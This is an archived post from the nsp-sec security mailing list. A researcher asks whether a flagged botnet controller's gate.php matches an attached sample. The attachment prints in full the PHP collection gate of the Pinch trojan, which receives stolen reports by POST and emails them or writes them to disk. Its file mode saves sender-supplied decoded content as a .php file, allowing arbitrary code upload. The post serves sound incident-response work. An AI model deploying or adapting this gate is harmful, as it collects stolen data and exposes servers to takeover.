[nsp-sec] 212.43.241.106 in the daily reports
Tom Fischer
tfischer at bfk.de
Mon Feb 25 09:08:33 EST 2008
Hi,
On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
does this gate.php look like the attached Pinch gate.php?
--
Tom Fischer
BFK edv-consulting GmbH tel: +49 721 962 01-1
Kriegsstr. 100, D-76133 Karlsruhe fax: +49 721 962 01-99
-------------- next part --------------
<?
//CFG
$mode = 1; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE; //Random reports names
$savetodir = TRUE; //Save rerorts to changed directory
$dirname = "load"; //Directory name
// a - recepient
// b - subject
// c - message body
// d - file name(not *.php)
//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg = str_replace(" ","+",$_POST['c']);
$var = $_POST['d'];
//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3){
IF($rndatch){
$array = range('a','z');
$c=count($array);
$var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
};
$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
};
//via File
IF($mode == 2 || $mode == 3){
//To dir
IF($savetodir){
// @mkdir($dirname);
@chdir($dirname);
}
//$vartype=substr($var,-3,3);
// IF($vartype == "php")
$var.=".rep";
$filename = $ip.".php";
$fp=fopen($filename,'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
};
?>
<title>ret_ok</title>
More information about the nsp-security
mailing list